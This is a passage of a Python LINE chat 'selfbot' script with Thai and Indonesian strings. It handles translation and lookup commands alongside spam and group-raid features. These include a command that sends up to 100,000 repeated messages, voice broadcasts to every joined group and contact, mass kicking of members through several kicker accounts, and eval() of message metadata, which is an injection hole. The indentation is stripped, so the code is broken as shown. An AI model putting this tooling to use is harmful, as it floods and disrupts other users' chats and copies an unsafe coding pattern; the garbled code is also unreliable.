elif msg.text.lower().startswith("tr-te "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='te')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-th "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='th')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-tr "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='tr')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-uk "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='uk')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ur "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ur')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-uz "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='uz')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-vi "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='vi')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-cy "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='cy')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-xh "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='xh')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-yi "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='yi')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-yo "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='yo')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-zu "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='zu')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-fil "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='fil')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-he "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='he')
A = hasil.text
line.sendMessage(msg.to, A)
elif "Bcvoice " in msg.text:
bctxt = msg.text.replace("Bcvoice ", "")
bc = ("⚔️ Š€£Բ ฿✪Ŧ β¥.Šαї ⚔️ \nŦ€Āʍ ĦĀ¢₭€Ɖ ĊΦƉ€")
cb = (bctxt + bc)
tts = gTTS(cb, lang='id', slow=False)
tts.save('tts.mp3')
n = line.getGroupIdsJoined()
for manusia in n:
line.sendAudio(manusia, 'tts.mp3')
elif "Cbcvoice " in msg.text:
bctxt = msg.text.replace("Cbcvoice ", "")
bc = ("⚔️ Š€£Բ ฿✪Ŧ β¥.Šαї ⚔️ \nŦ€Āʍ ĦĀ¢₭€Ɖ ĊΦƉ€")
cb = (bctxt + bc)
tts = gTTS(cb, lang='id', slow=False)
tts.save('tts.mp3')
n = line.getAllContactIdsJoined()
for manusia in n:
line.sendAudio(manusia, 'tts.mp3')
elif "Dow " in msg.text:
try:
wiki = msg.text.lower().replace("Dow ","")
wikipedia.set_lang("id")
pesan="Title ("
pesan+=wikipedia.page(wiki).title
pesan+=")\n\n"
pesan+=wikipedia.summary(wiki, sentences=1)
pesan+="\n"
pesan+=wikipedia.page(wiki).url
line.sendMessage(msg.to, pesan)
except:
try:
pesan="เกินขีด จำกัด ข้อความ! โปรดคลิกลิงก์\n"
pesan+=wikipedia.page(wiki).url
line.sendText(msg.to, pesan)
except Exception as e:
line.sendMessage(msg.to, str(e))
elif "ค้นหาหนัง" in msg.text:
proses = msg.text.split(":")
get = msg.text.replace(proses[0] + ":","")
getfilm = get.split()
title = getfilm[0]
tahun = getfilm[1]
r = requests.get('http://www.omdbapi.com/?t='+title+'&y='+tahun+'&plot=full&apikey=4bdd1d70')
start = time.time()
data=r.text
data=json.loads(data)
hasil = "Informasi \n" +str(data["Title"])+ " (" +str(data["Year"])+ ")"
hasil += "\n\n " +str(data["Plot"])
hasil += "\n\nDirector : " +str(data["Director"])
hasil += "\nActors : " +str(data["Actors"])
hasil += "\nRelease : " +str(data["Released"])
hasil += "\nGenre : " +str(data["Genre"])
hasil += "\nRuntime : " +str(data["Runtime"])
path = data["Poster"]
line.sendImageWithURL(msg.to, str(path))
line.sendMessage(msg.to,hasil)
elif text.lower() == 'Day':
tz = pytz.timezone("Asia/Makassar")
timeNow = datetime.now(tz=tz)
day = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday","Friday", "Saturday"]
hari = ["Minggu", "Senin", "Selasa", "Rabu", "Kamis", "Jumat", "Sabtu"]
bulan = ["Januari", "Februari", "Maret", "April", "Mei", "Juni", "Juli", "Agustus", "September", "Oktober", "November", "Desember"]
hr = timeNow.strftime("%A")
bln = timeNow.strftime("%m")
for i in range(len(day)):
if hr == day[i]: hasil = hari[i]
for k in range(0, len(bulan)):
if bln == str(k): bln = bulan[k-1]
readTime = hasil + ", " + timeNow.strftime('%d') + " - " + bln + " - " + timeNow.strftime('%Y') + "\nJam : [ " + timeNow.strftime('%H:%M:%S') + " ]"
line.sendMessage(msg.to, readTime)
elif "ค้นหาอินสตาแกรม" in msg.text.lower():
sep = text.split(" ")
search = text.replace(sep[0] + " ","")
with requests.session() as web:
web.headers["User-Agent"] = random.choice(settings["userAgent"])
r = web.get("https://www.instagram.com/{}/?__a=1".format(search))
try:
data = json.loads(r.text)
ret_ = " ⚔️ Š€£Բ ฿✪Ŧ β¥.Šαї ⚔️ "
ret_ += "\n ชื่อ {}".format(str(data["user"]["full_name"]))
ret_ += "\n ยูเซอเนม : {}".format(str(data["user"]["username"]))
ret_ += "\n ตัส {}".format(str(data["user"]["biography"]))
ret_ += "\n ผู้ติดตาม {}".format(format_number(data["user"]["followed_by"]["count"]))
ret_ += "\n ติดตาม {}".format(format_number(data["user"]["follows"]["count"]))
if data["user"]["is_verified"] == True:
ret_ += "\n การยืนยัน: แล้ว"
else:
ret_ += "\n การยืนยัน: ยังไม่ได้"
if data["user"]["is_private"] == True:
ret_ += "\n Akun Pribadi : Iya"
else:
ret_ += "\n บัญชีส่วนบุคคล: ไม่"
ret_ += "\n Post : {}".format(format_number(data["user"]["media"]["count"]))
ret_ += "\n[ https://www.instagram.com/{} ]".format(search)
path = data["user"]["profile_pic_url_hd"]
line.sendImageWithURL(to, str(path))
line.sendMessage(to, str(ret_))
except:
line.sendMessage(to, "ไม่พบผู้ใช้")
line.sendMessage(to, str(ret_))
elif "ค้นหารูป" in msg.text.lower():
separate = msg.text.split(" ")
search = msg.text.replace(separate[0] + " ","")
with requests.session() as web:
web.headers["User-Agent"] = random.choice(settings["userAgent"])
r = web.get("http://rahandiapi.herokuapp.com/imageapi?key=betakey&q={}".format(urllib.parse.quote(search)))
data = r.text
data = json.loads(data)
if data["result"] != []:
items = data["result"]
path = random.choice(items)
a = items.index(path)
b = len(items)
line.sendImageWithURL(to, str(path))
elif "รูปการตูน" in msg.text.lower():
separate = msg.text.split(" ")
search = msg.text.replace(separate[0] + " ","")
with requests.session() as web:
web.headers["User-Agent"] = random.choice(settings["userAgent"])
r = web.get("http://rahandiapi.herokuapp.com/imageapi?key=betakey&q={}".format(urllib.parse.quote(search)))
data = r.text
data = json.loads(data)
if data["result"] != []:
items = data["result"]
path = random.choice(items)
a = items.index(path)
b = len(items)
line.sendImageWithURL(to, str(path))
elif "ค้นหายูทูป" in msg.text.lower():
sep = text.split(" ")
search = text.replace(sep[0] + " ","")
params = {"search_query": search}
with requests.session() as web:
web.headers["User-Agent"] = random.choice(settings["userAgent"])
r = web.get("https://www.youtube.com/results", params = params)
soup = BeautifulSoup(r.content, "html.parser")
ret_ = "การค้นหามีรายละเอียดตามนี้"
datas = []
for data in soup.select(".yt-lockup-title > a[title]"):
if "&lists" not in data["href"]:
datas.append(data)
for data in datas:
ret_ += "\n⋙ {} ]".format(str(data["title"]))
ret_ += "\n⋙ https://www.youtube.com{}".format(str(data["href"]) + "\n")
ret_ += "\n\n⋙ ที่พบ {} คลิป".format(len(datas))
line.sendMessage(to, str(ret_))
elif msg.text in ["อ่านออโต้เปิด"]:
try:
del RfuCctv['point'][msg.to]
del RfuCctv['sidermem'][msg.to]
del RfuCctv['cyduk'][msg.to]
except:
pass
RfuCctv['point'][msg.to] = msg.id
RfuCctv['sidermem'][msg.to] = ""
RfuCctv['cyduk'][msg.to]=True
line.sendMessage(msg.to," ⚔️ Š€£Բ ฿✪Ŧ β¥.Šαї ⚔️")
elif msg.text in ["อ่านออโต้ปิด"]:
if msg.to in RfuCctv['point']:
RfuCctv['cyduk'][msg.to]=False
line.sendText(msg.to, RfuCctv['sidermem'][msg.to])
else:
line.sendMessage(msg.to, " ⚔️ Š€£Բ ฿✪Ŧ β¥.Šαї ⚔️")
elif text.lower() == 'รายการเพื่อน':
contactlist = line.getAllContactIds()
kontak = line.getContacts(contactlist)
num=1
msgs="⚔️ Š€£Բ ฿✪Ŧ β¥.Šαї ⚔️"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.displayName)
num=(num+1)
msgs+="\nจำนวน %i" % len(kontak)
line.sendMessage(msg.to, msgs)
elif msg.text in ["รายการบล็อค"]:
blockedlist = line.getBlockedContactIds()
kontak = line.getContacts(blockedlist)
num=1
msgs="⚔️ Š€£Բ ฿✪Ŧ β¥.Šαї ⚔️"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.displayName)
num=(num+1)
msgs+="\nจำนวน %i" % len(kontak)
line.sendMessage(receiver, msgs)
elif msg.text in ["รายการmid"]:
gruplist = line.getAllContactIds()
kontak = line.getContacts(gruplist)
num=1
msgs="⚔️ Š€£Բ ฿✪Ŧ β¥.Šαї ⚔️"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.mid)
num=(num+1)
msgs+="\nจำนวน %i" % len(kontak)
line.sendMessage(receiver, msgs)
elif msg.text.lower() == 'เชิญกุ':
if msg.toType == 2:
ginfo = line.getGroup(receiver)
try:
gcmid = ginfo.creator.mid
except:
gcmid = "Error"
if settings["lang"] == "JP":
line.inviteIntoGroup(receiver,[gcmid])
line.sendMessage(receiver, "พิมพ์คำเชิญกลุ่ม")
else:
line.inviteIntoGroup(receiver,[gcmid])
line.sendMessage(receiver, "ผู้สร้างกลุ่มอยู่ในแล้ว")
elif msg.text in ["ออก"]:
if msg.toType == 2:
ginfo = line.getGroup(receiver)
try:
line.leaveGroup(receiver)
ki.leaveGroup(receiver)
kk.leaveGroup(receiver)
kc.leaveGroup(receiver)
ke.leaveGroup(receiver)
except:
pass
elif msg.text in ["แท็กเปิด"]:
settings["detectMention"] = True
line.sendMessage(msg.to,"เปิดระบบข้อความแท็ก")
elif msg.text in ["แท็กปิด"]:
settings["detectMention"] = False
line.sendMessage(msg.to,"ปิดระบบข้อความแท็ก")
elif 'ตั้งแท็ก: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('ตั้งแท็ก: ','')
if spl in [""," ","\n",None]:
line.sendMessage(msg.to, "ตั้งข้อความเรืยบร้อย")
else:
settings["Respontag"] = spl
line.sendMessage(msg.to, "⚔️ Š€£Բ ฿✪Ŧ β¥.Šαї ⚔️\n\n{}".format(str(spl)))
elif 'ทักออก: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('ทักออก: ','')
if spl in [""," ","\n",None]:
line.sendMessage(msg.to, "ตั้งข้อความคนออกเรียบร้อย")
else:
settings["bye"] = spl
line.sendMessage(msg.to, "⚔️ Š€£Բ ฿✪Ŧ β¥.Šαї ⚔️\n\n\n{}".format(str(spl)))
elif 'ทักเข้า: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('ทักเข้า: ','')
if spl in [""," ","\n",None]:
line.sendMessage(msg.to, "ตั้งข้อความคนเข้าเรียบร้อยแล้ว")
else:
settings["welcome"] = spl
line.sendMessage(msg.to, "⚔️ Š€£Բ ฿✪Ŧ β¥.Šαї ⚔️\n\n\n{}".format(str(spl)))
elif msg.text.lower().startswith("ภาพ "):
sep = msg.text.split(" ")
textnya = msg.text.replace(sep[0] + " ","")
urlnya = "http://chart.apis.google.com/chart?chs=480x80&cht=p3&chtt=" + textnya + "&chts=FFFFFF,70&chf=bg,s,000000"
line.sendImageWithURL(msg.to, urlnya)
elif text.lower() == 'ลบรัน':
gid = line.getGroupIdsInvited()
start = time.time()
for i in gid:
line.rejectGroupInvitation(i)
elapsed_time = time.time() - start
line.sendMessage(to, "ลบแล้วจร้าา")
line.sendMessage(to, "เวลาที่ใฃ้: %sวินาที" % (elapsed_time))
elif text.lower() == 'zt':
gs = line.getGroup(to)
targets = []
for g in gs.members:
if g.displayName in "":
targets.append(g.mid)
if targets == []:
line.sendMessage(to, "ม่มีคนใส่ร่องหนในกลุ่มนี้😂")
else:
mc = ""
for target in targets:
mc += sendMessageWithMention(to,target) + "\n"
line.sendMessage(to, mc)
elif text.lower() == 'zm':
gs = line.getGroup(to)
lists = []
for g in gs.members:
if g.displayName in "":
lists.append(g.mid)
if lists == []:
line.sendMessage(to, "ไม่มีmidคนใส่ร่องหน🤗")
else:
mc = ""
for mi_d in lists:
mc += "->" + mi_d + "\n"
line.sendMessage(to,mc)
elif text.lower() == 'zc':
gs = line.getGroup(to)
lists = []
for g in gs.members:
if g.displayName in "":
lists.append(g.mid)
if lists == []:
line.sendMessage(to, "ไม่มีคนใส่ร่องหนในกลุ่มนี้😂")
else:
for ls in lists:
contact = line.getContact(ls)
mi_d = contact.mid
line.sendContact(to, mi_d)
elif "Spam " in msg.text:
txt = msg.text.split(" ")
jmlh = int(txt[2])
teks = msg.text.replace("Spam "+str(txt[1])+" "+str(jmlh)+" ","")
tulisan = jmlh * (teks+"\n")
if txt[1] == "on":
if jmlh <= 100000:
for x in range(jmlh):
line.sendMessage(msg.to, teks)
else:
line.sendMessage(msg.to, "Out of Range!")
elif txt[1] == "off":
if jmlh <= 100000:
line.sendMessage(msg.to, tulisan)
else:
line.sendMessage(msg.to, "Out Of Range!")
elif 'ลบเชิญS' in msg.text.lower():
if msg.toType == 2:
X = line.getGroup(msg.to)
if X.invitee is not None:
gInviMids = [contact.mid for contact in X.invitee]
line.cancelGroupInvitation(msg.to, gInviMids)
else:
if settings["lang"] == "JP":
line.sendMessage(msg.to,"ไม่มีการเชิญ")
else:
line.sendMessage(msg.to,"ขออภัยไม่มี")
else:
if settings["lang"] == "JP":
line.sendMessage(msg.to,"ไม่สามารถใช้นอกกลุ่มได้")
else:
line.sendMessage(msg.to,"ไม่ใช้งานน้อยกว่ากลุ่ม")
elif 'ตั้งคนออก: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('ตั้งคนออก: ','')
if spl in [""," ","\n",None]:
line.sendMessage(msg.to, "ตั้งคนออก")
else:
settings["Nn"] = spl
line.sendMessage(msg.to, "{}".format(str(spl)))
elif 'ตั้งคนเข้า: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('ตั้งคนเข้า: ','')
if spl in [""," ","\n",None]:
line.sendMessage(msg.to, "ตั้งคนออก")
else:
settings["Sd"] = spl
line.sendMessage(msg.to, "{}".format(str(spl)))
elif msg.text in ["เชิญ"]:
settings["winvite"] = True
line.sendMessage(msg.to,"ส่งรายชื่อเพื่อเชิญ")
elif msg.text in ["cb"]:
settings["blacklist"] = {}
line.sendMessage(msg.to,"ทำการลบัญชีดำทั้งหมดเรียบร้อย")
print ("Clear Ban")
elif text.lower() == 'Sai':
if msg.toType == 2:
group = line.getGroup(to)
group.preventedJoinByTicket = False
line.updateGroup(group)
invsend = 0
ticket = line.reissueGroupTicket(to)
ki.acceptGroupInvitationByTicket(to,format(str(ticket)))
time.sleep(0.01)
kk.acceptGroupInvitationByTicket(to,format(str(ticket)))
time.sleep(0.01)
kc.acceptGroupInvitationByTicket(to,format(str(ticket)))
time.sleep(0.01)
ke.acceptGroupInvitationByTicket(to,format(str(ticket)))
time.sleep(0.01)
group.preventedJoinByTicket = True
line.updateGroup(group)
print ("คลิ้กเข้า ")
elif 'เตะ' in text.lower():
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"] [0] ["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
random.choice(Rfu).kickoutFromGroup(msg.to,[target])
print ("เตะคน")
except:
random.choice(Rfu).sendMessage(msg.to,"จำกัด")
elif 'เตะ1' in text.lower():
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"] [0] ["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
line.kickoutFromGroup(msg.to,[target])
print ("เตะคน1")
except:
line.sendMessage(msg.to,"จำกัด")
elif '1 ' in text.lower():
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"] [0] ["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki.kickoutFromGroup(msg.to,[target])
print ("คลิ้ก1เตะ")
except:
ki.sendMessage(msg.to,"จำกัด")
elif '2 ' in text.lower():
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"] [0] ["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
kk.kickoutFromGroup(msg.to,[target])
print ("คลิ้ก2เตะ")
except:
kk.sendMessage(msg.to,"จำกัด")
elif '3 ' in text.lower():
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"] [0] ["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
kc.kickoutFromGroup(msg.to,[target])
print ("คลิ้ก3เตะ")
except:
kc.sendMessage(msg.to,"จำกัด")
elif 'เชิญ' in text.lower():
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"] [0] ["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
line.inviteIntoGroup(msg.to,[target])
line.sendMessage(receiver, "เชิญok")
except:
line.sendMessage(msg.to,"จำกัด การเชิญ")
elif '1เชิญ' in text.lower():
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"] [0] ["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki.inviteIntoGroup(msg.to,[target])
ki.sendMessage(receiver, "เชิญok")
print ("R1 invite User")
except:
ki.sendMessage(msg.to,"จำกัด การเชิญ")
elif '2เชิญ' in text.lower():
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"] [0] ["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
kk.inviteIntoGroup(msg.to,[target])
kk.sendMessage(receiver, "เชิญok")
("R2 invite User")
except:
kk.sendMessage(msg.to,"จำกัด การเชิญ")
elif '3เชิญ' in text.lower():
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"] [0] ["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
kc.inviteIntoGroup(msg.to,[target])
kc.sendMessage(receiver, "เชิญ")
("R3 invite User")
except:
kc.sendMessage(msg.to,"จำกัด การเชิญ")
elif "Cleanse" in msg.text:
if msg.toType == 2:
_name = msg.text.replace("Cleanse","")
gs = line.getGroup(receiver)
line.sendMessage(receiver,"Just some casual cleansing ô")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
line.sendMessage(receiver,"Not found.")
else:
for target in targets:
if not target in Rfu:
try:
klist=[line,ki,kk,kc,ke]
kicker=random.choice(klist)
kicker.kickoutFromGroup(receiver,[target])
print((receiver,[g.mid]))
except:
line.sendMessage(receiver,"Group cleanse")
print ("Cleanse Group")
elif msg.text in ["เตะดำ"]:
if msg.toType == 2:
group = line.getGroup(receiver)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in settings["blacklist"]:
matched_list+=[str for str in gMembMids if str == tag]
if matched_list == []:
line.sendMessage(receiver,"ไม่มีบัญชีดำ")
else:
for jj in matched_list:
try:
klist=[line,ki,kk,kc,ke]
kicker=random.choice(klist)
kicker.kickoutFromGroup(receiver,[jj])
print((receiver,[jj]))
except:
line.sendMessage(receiver,"เตะกุเตะกลับ")
print ("ไล่เตะดำ")
elif text.lower() == "ลบแชท":
if msg._from in Family:
try:
line.removeAllMessages(op.param2)
kk.removeAllMessages(op.param2)
kc.removeAllMessages(op.param2)
ke.removeAllMessages(op.param2)
line.sendMessage(msg.to,"ลบทุกการแชทเรียบร้อย")
except:
pass
print ("ลบแชท")
elif text.lower() == "ออก1":
if msg._from in Family:
ki.leaveGroup(msg.to)
kk.leaveGroup(msg.to)
kc.leaveGroup(msg.to)
ke.leaveGroup(msg.to)
print ("Kicker Leave")
elif text.lower() == "ออกแชทรวม":
if msg._from in Family:
gid = line.getGroupIdsJoined()
for i in gid:
ki.leaveGroup(i)
kk.leaveGroup(i)
kc.leaveGroup(i)
ke.leaveGroup(i)
print ("ออกแชท")
elif "ชื่อ: " in text.lower():
if msg._from in Family:
proses = text.split(": ")
string = text.replace(proses[0] + ": ","")
profile_A = line.getProfile()
profile_A.displayName = string
line.updateProfile(profile_A)
line.sendMessage(msg.to,"ok เปลี่ยนแล้ว เปลี่ยวเป็น " + string)
print ("Update Name")
elif "ตัส: " in msg.text.lower():
if msg._from in Family:
proses = text.split(": ")
string = text.replace(proses[0] + ": ","")
profile_A = line.getProfile()
profile_A.statusMessage = string
line.updateProfile(profile_A)
line.sendMessage(msg.to,"ok คุณได้เปลี่ยนแล้ว เป็น " + string)
print ("Update Bio Succes")
elif "คลิ้ก: " in text.lower():
if msg._from in Family:
proses = text.split(": ")
string = text.replace(proses[0] + ": ","")
profile_A = ki.getProfile()
profile_B = kk.getProfile()
profile_C = kc.getProfile()
profile_D = ke.getProfile()
profile_A.displayName = string
profile_B.displayName = string
profile_C.displayName = string
profile_D.displayName = string
ki.updateProfile(profile_A)
kk.updateProfile(profile_B)
kc.updateProfile(profile_C)
ke.updateProfile(profile_D)
line.sendMessage(msg.to,"คุณได้เปลี่ยนชื่อคลิ้กเกอร์ เป็น " + string)
print ("Update Name All Kicker")
elif "ตัสคลิ้ก: " in text.lower():
if msg._from in Family:
proses = text.split(": ")
string = text.replace(proses[0] + ": ","")
profile_A = ki.getProfile()
profile_B = kk.getProfile()
profile_C = kc.getProfile()
profile_D = kc.getProfile()
profile_A.statusMessage = string
profile_B.statusMessage = string
profile_C.statusMessage = string
profile_D.statusMessage = string
ki.updateProfile(profile_A)
kk.updateProfile(profile_B)
kc.updateProfile(profile_C)
ke.updateProfile(profile_D)
line.sendMessage(msg.to,"Update Bio All Kicker to : " + string)
print ("Update Bio All Kicker")
elif text.lower() == "sai":
if msg._from in Family:
profile = ki.getProfile()
text = profile.displayName + ""
ki.sendMessage(to, text)
profile = kk.getProfile()
text = profile.displayName + ""
kk.sendMessage(to, text)
profile = kc.getProfile()
text = profile.displayName + ""
kc.sendMessage(to, text)
profile = ke.getProfile()
text = profile.displayName + ""
ke.sendMessage(to, text)
print ("สั่งคลิ้กเข้า")
#=============COMMAND PROTECT=========================#
elif msg.text.lower() == 'protect on':
if RfuProtect["protect"] == True:
if settings["lang"] == "JP":
line.sendMessage(msg.to,"เปิดป้องกัน ")
else:
line.sendMessage(msg.to,"เปิดป้องกัน ")
else:
RfuProtect["protect"] = True
if settings["lang"] == "JP":
line.sendMessage(msg.to,"เปิดป้องกัน ")
else:
line.sendMessage(msg.to,"เปิดป้องกัน ")
elif msg.text.lower() == 'protect off':
if RfuProtect["protect"] == False:
if settings["lang"] == "JP":
line.sendMessage(msg.to,"ปิดป้องกัน ")
else:
line.sendMessage(msg.to,"ปิดป้องกัน ")
else:
RfuProtect["protect"] = False
if settings["lang"] == "JP":
line.sendMessage(msg.to,"ปิดป้องกัน ")
else:
line.sendMessage(msg.to,"ปิดป้องกัน ")
elif msg.text.lower() == 'cancel on':
if RfuProtect["cancelprotect"] == True:
if settings["lang"] == "JP":
line.sendMessage(msg.to,"เปิดป้องกันยกเลิกเชิญสมาชิก ")
else:
line.sendMessage(msg.to,"เปิดป้องกันยกเลิกเชิญสมาชิก ")
else:
RfuProtect["cancelprotect"] = True
if settings["lang"] == "JP":
line.sendMessage(msg.to,"เปิดป้องกันยกเลิกเชิญสมาชิก ")
else:
line.sendMessage(msg.to,"เปิดป้องกันยกเลิกเชิญสมาชิก ")
elif msg.text.lower() == 'cancel off':
if RfuProtect["cancelprotect"] == False:
if settings["lang"] == "JP":
line.sendMessage(msg.to,"ปิดป้องกันยกเลิกเชิญสมาชิก ")
else:
line.sendMessage(msg.to,"ปิดป้องกันยกเลิกเชิญสมาชิก ")
else:
RfuProtect["cancelprotect"] = False
if settings["lang"] == "JP":
line.sendMessage(msg.to,"ปิดป้องกันยกเลิกเชิญสมาชิก ")
else:
line.sendMessage(msg.to,"ปิดป้องกันยกเลิกเชิญสมาชิก ")
elif msg.text.lower() == 'invit on':
if RfuProtect["inviteprotect"] == True:
if settings["lang"] == "JP":
line.sendMessage(msg.to,"เปิดป้องกันเชิญสมาชิก ")
else:
line.sendMessage(msg.to,"เปิดป้องกันเชิญสมาชิก ")
else:
RfuProtect["inviteprotect"] = True
if settings["lang"] == "JP":
line.sendMessage(msg.to,"เปิดป้องกันเชิญสมาชิก ")
else:
line.sendMessage(msg.to,"เปิดป้องกันเชิญสมาชิก ")
elif msg.text.lower() == 'invit off':
if RfuProtect["inviteprotect"] == False:
if settings["lang"] == "JP":
line.sendMessage(msg.to,"ปิดป้องกันเชิญสมาชิก ")
else:
line.sendMessage(msg.to,"ปิดป้องกันเชิญสมาชิก ")
else:
RfuProtect["inviteprotect"] = False
if settings["lang"] == "JP":
line.sendMessage(msg.to,"ปิดป้องกันเชิญสมาชิก ")
else:
line.sendMessage(msg.to,"ปิดป้องกันเชิญสมาชิก ")
elif msg.text.lower() == 'link on':
if RfuProtect["linkprotect"] == True:
if settings["lang"] == "JP":
line.sendMessage(msg.to,"เปิดป้องกันลิ้งกลุ่ม ")
else:
line.sendMessage(msg.to,"เปิดป้องกันลิ้งกลุ่ม ")
else:
RfuProtect["linkprotect"] = True
if settings["lang"] == "JP":
line.sendMessage(msg.to,"เปิดป้องกันลิ้งกลุ่ม ")
else:
line.sendMessage(msg.to,"เปิดป้องกันลิ้งกลุ่ม ")
elif msg.text.lower() == 'link off':
if RfuProtect["linkprotect"] == False:
if settings["lang"] == "JP":
line.sendMessage(msg.to,"ปิดป้องกันลิ้งกลุ่ม ")
else:
line.sendMessage(msg.to,"ปิดป้องกันลิ้งกลุ่ม ")
else:
RfuProtect["linkprotect"] = False
if settings["lang"] == "JP":
line.sendMessage(msg.to,"ปิดป้องกันลิ้งกลุ่ม ")
else:
line.sendMessage(msg.to,"ปิดป้องกันลิ้งกลุ่ม ")
elif msg.text.lower() == 'guest on':
if RfuProtect["Protectguest"] == True:
if settings["lang"] == "JP":
line.sendMessage(msg.to,"เปิดป้องกันสมาชิกกลุ่ม ")
else:
line.sendMessage(msg.to,"เปิดป้องกันสมาชิกกลุ่ม ")
else:
RfuProtect["Protectguest"] = True
if settings["lang"] == "JP":
line.sendMessage(msg.to,"เปิดป้องกันสมาชิกกลุ่ม ")
else:
line.sendMessage(msg.to,"เปิดป้องกันสมาชิก กลุ่ม ")
elif msg.text.lower() == 'guest off':
if RfuProtect["Protectguest"] == False:
if settings["lang"] == "JP":
line.sendMessage(msg.to,"ปิดป้องกันสมาชิกกลุ่ม ")
else:
line.sendMessage(msg.to,"ปิดป้องกันสมาชิกกลุ่ม ")
else:
RfuProtect["Protectguest"] = False
if settings["lang"] == "JP":
line.sendMessage(msg.to,"ปิดป้องกันสมาชิกกลุ่ม ")
else:
line.sendMessage(msg.to,"ปิดป้องกันสมาชิกกลุ่ม ")
elif msg.text.lower() == 'join on':
if RfuProtect["Protectjoin"] == True:
if settings["lang"] == "JP":
line.sendMessage(msg.to,"เปิดป้องกันคนเข้ากลุ่ม ")
else:
line.sendMessage(msg.to,"เปิดป้องกันคนเข้ากลุ่ม ")
else:
RfuProtect["Protectjoin"] = True
if settings["lang"] == "JP":
line.sendMessage(msg.to,"เปิดป้องกันคนเข้ากลุ่ม ")
else:
line.sendMessage(msg.to,"เปิดป้องกันคนเข้ากลุ่ม ")
elif msg.text.lower() == 'join off':
if RfuProtect["Protectjoin"] == False:
if settings["lang"] == "JP":
line.sendMessage(msg.to,"ปิดป้องกันคนเข้ากลุ่ม ")
else:
line.sendMessage(msg.to,"ปิดป้องกันคนเข้ากลุ่ม ")
else:
RfuProtect["Protectjoin"] = False
if settings["lang"] == "JP":
line.sendMessage(msg.to,"ปิดป้องกันคนเข้ากลุ่ม ")
else:
line.sendMessage(msg.to,"ปิดป้องกันคนเข้ากลุ่ม ")
elif msg.text.lower() == 'เปิดหมด':
if RfuProtect["inviteprotect"] == True:
if settings["lang"] == "JP":
line.sendMessage(msg.to,"เปิดป้องกันทั้งหมดเรียบร้อยแล้ว")
else:
line.sendMessage(msg.to,"เปิดป้องกันทั้งหมดเรียบร้อยแล้ว")
else:
RfuProtect["inviteprotect"] = True
if settings["lang"] == "JP":
